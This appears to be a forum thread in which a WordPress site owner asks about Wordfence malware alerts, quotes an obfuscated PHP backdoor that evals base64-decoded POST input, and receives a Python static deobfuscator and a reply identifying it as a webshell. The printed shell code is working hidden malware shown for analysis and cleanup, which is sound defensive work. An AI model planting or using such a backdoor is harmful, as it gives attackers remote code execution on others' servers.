WordPress vulnerabilities alerts

I have just run the plugin Wordfence and it gave me some issues to fix.

There are two groups with the same suspicious code:

File appears to be malicious: wp-admin/cache/alias90.php
File appears to be malicious: wp-content/languages/plugins/title.php
File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/lib.php
File appears to be malicious: wp-includes/js/tinymce/utils/blog.php
File appears to be malicious: wp-content/uploads/2013/start24.php

The description says: This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “@$GLOBALS[$GLOBALS[‘y23c’][67].$GLOBALS[‘y23c’][76].$GLOBALS[‘y23c’][76]”.

And the second group:

File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/gallery.php.suspected
File appears to be malicious: wp-content/themes/themename/languages/dump.php.suspected
File appears to be malicious: wp-content/uploads/2013/05/help.php.suspected
File appears to be malicious: wp-content/uploads/2014/04/model.php.suspected
File appears to be malicious: wp-content/uploads/2015/06/blog.php.suspected

Where the description is: This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “strtolower($sF[4].$sF[5].$sF[9]”.

What should I do with those files? Are they actually malware?

EDIT: The files from the second group have this code:

<?php 
$sF="PCT4BA6ODSE_";                                                                                           // 12-character alphabet the real names are spelled from
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]); // assembles the string "base64_decode"
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);                                                         // assembles the string "_POST"
if (isset(${$s20}['n726b60'])) {                                                                              // ${$s20} is PHP's variable-variable, i.e. $_POST
    eval($s21(${$s20}['n726b60']));                                                                           // executes whatever PHP arrives in that POST field
}
?>

EDIT2: I evaluated that code and it's returning this:

base64_decode($_POST['n726b60']);

Is this something dangerous?
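The string-index trick in the second group can be resolved without ever running the file, which matters because evaluating a suspected webshell on the server is exactly what you want to avoid. The script below is an added example (not part of the original post and not Wordfence code): it parses the `$sF[n]` concatenations statically, substitutes the recovered names back into the source, and then flags any code-execution sink whose argument comes from request data. The sample is the file quoted in the question, embedded as a constructed string; the regexes only cover this concatenation-from-a-literal form, so the first group's `$GLOBALS['y23c'][67]` variant (the same idea using an array) would need the lookup extended. All function and variable names in the script are my own.

```python
import re

# Constructed sample: the obfuscated file quoted in the question (EDIT section),
# embedded as a string so nothing is read from disk and nothing is ever executed.
SAMPLE = r'''<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n726b60'])) {
    eval($s21(${$s20}['n726b60']));
}
?>'''

# $name="literal";  -- the alphabet the hidden names are spelled from
STRING_ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"\\]*)"\s*;')
# $name=strtolower($a[4].$a[5]...);  -- a name assembled one character at a time
BUILT_ASSIGN_RE = re.compile(
    r'\$(\w+)\s*=\s*(?:(strtolower|strtoupper)\s*\()?((?:\s*\$\w+\[\d+\]\s*\.?)+)\)?\s*;')
CHAR_REF_RE = re.compile(r'\$(\w+)\[(\d+)\]')

SUPERGLOBALS = ("_POST", "_GET", "_REQUEST", "_COOKIE", "_SERVER")
CODE_SINKS = ("eval", "assert", "create_function", "system", "passthru", "shell_exec", "exec")


def literal_strings(src):
    """Collect plain double-quoted string assignments, e.g. {'sF': 'PCT4BA6ODSE_'}."""
    return dict(STRING_ASSIGN_RE.findall(src))


def rebuild_strings(src, literals):
    """Resolve variables spelled from single characters of a literal, honouring the case wrapper."""
    built = {}
    for name, casefn, parts in BUILT_ASSIGN_RE.findall(src):
        chars = []
        for base, idx in CHAR_REF_RE.findall(parts):
            source = literals.get(base, built.get(base))
            if source is None or int(idx) >= len(source):
                chars = None  # references something we cannot resolve statically
                break
            chars.append(source[int(idx)])
        if chars is None:
            continue
        value = "".join(chars)
        if casefn == "strtolower":
            value = value.lower()
        elif casefn == "strtoupper":
            value = value.upper()
        built[name] = value
    return built


def deobfuscate(src):
    """Return (resolved names, source with the assembled names substituted back in)."""
    literals = literal_strings(src)
    built = rebuild_strings(src, literals)
    body = BUILT_ASSIGN_RE.sub("", STRING_ASSIGN_RE.sub("", src))
    for name, value in built.items():
        # ${$x} is PHP's variable-variable: the *value* of $x names the variable actually read.
        body = body.replace("${$" + name + "}", "$" + value)
        # $x(...) calls the function whose name is stored in $x.
        body = re.sub(r"\$" + re.escape(name) + r"\b", lambda _m, v=value: v, body)
    body = "\n".join(line for line in body.splitlines() if line.strip())
    return built, body


def assess(body):
    """List (sink, request sources) pairs: a code sink fed from request data is attacker-controlled."""
    findings = []
    for line in body.splitlines():
        for sink in CODE_SINKS:
            if re.search(r"\b%s\s*\(" % sink, line):
                tainted = sorted(g for g in SUPERGLOBALS if "$" + g in line)
                findings.append((sink, tainted))
    return findings


if __name__ == "__main__":
    names, plain = deobfuscate(SAMPLE)
    print("resolved names:", names)
    print(plain)
    for sink, sources in assess(plain):
        print("sink %s() fed from %s" % (sink, ", ".join(sources) or "unknown"))
```

Run against the sample, the recovered source reads `eval(base64_decode($_POST['n726b60']));`, which is the finding that answers the question: an `eval` sink fed directly from a POST parameter is remote code execution for anyone who knows the field name. The same static approach is what to reach for when triaging the other flagged files, rather than executing them to see what they return.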


1 comment

  1. It is a shell that is used to run malicious code on your server. They are uploaded to your server generally through online bots that scan sites for vulnerable WordPress plugins. Essentially, the shell code allows them to run code based off input of a $_POST variable by using the eval function.

    I have encountered this on a client's WordPress site where they had a mass amount of unnecessary plugins that should have been disabled + deleted.

    I would seriously consider checking all of your WordPress plugins through Google and see if you can find any vulnerabilities posted publicly. Also, try to go through all directories and delete files similar to these.
